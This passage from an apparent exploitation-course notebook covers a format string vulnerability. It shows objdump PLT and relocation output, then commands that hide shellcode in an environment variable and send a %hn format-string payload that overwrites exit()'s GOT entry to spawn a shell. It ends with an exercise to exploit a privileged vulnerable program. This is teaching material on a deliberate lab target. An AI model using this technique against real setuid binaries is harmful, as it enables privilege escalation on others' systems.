 8048360:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048366:	68 00 00 00 00       	push   $0x0
 804836b:	e9 e0 ff ff ff       	jmp    8048350 <_init+0x24>

08048370 <strcpy@plt>:
 8048370:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048376:	68 08 00 00 00       	push   $0x8
 804837b:	e9 d0 ff ff ff       	jmp    8048350 <_init+0x24>

08048380 <puts@plt>:
 8048380:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048386:	68 10 00 00 00       	push   $0x10
 804838b:	e9 c0 ff ff ff       	jmp    8048350 <_init+0x24>

08048390 <exit@plt>:
 8048390:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048396:	68 18 00 00 00       	push   $0x18
 804839b:	e9 b0 ff ff ff       	jmp    8048350 <_init+0x24>

080483a0 <__libc_start_main@plt

In [30]:
# display all dynamic relocations
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804a014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.0
0804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804a020 R_386_JUMP_SLOT   putchar@GLIBC_2.0




## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda - see [GDB-Peda.ipynb](./GDB-Peda.ipynb) Notebook for details
- use perl -e 'print to write shellcode as a binary file' > shellcode.bin
- export shllcode as an env variable
- find and write the address of shellcode into the address of the exit() function
- you'll get a shell

```
$ export SHELLCODE=$(cat shellcode.bin)
$ ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe
$ echo $((0xbfff - 8)) # higher two bytes
$ echo $((0xf020 - 0xbfff)) # lower two bytes
# write to higher byte address for exit() first and then to lower byte address
$ ./fmt_vuln.exe $(printf "\x1a\xa0\x04\x08\x18\xa0\x04\x08")%49143x%4\$hn%12321x%5\$hn
```

In [34]:
# create SHELLCODE env variable
! export SHELLCODE=$(cat shellcode.bin)

In [37]:
# get the address of SHELLCODE variable
# run it in terminal if you do not see complete address!
! ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe

SHELLCODE will be at 0x4


## Exercise
- Smuggle your `shellcode` as a part of data to into the program and exploit the `format string` vulnerability.
- use fmt_vuln1.c program found in booksrc folder of this repo
- compile and make fmt_vuln1.c program a privileged program
- find the address of return address and update with the address of input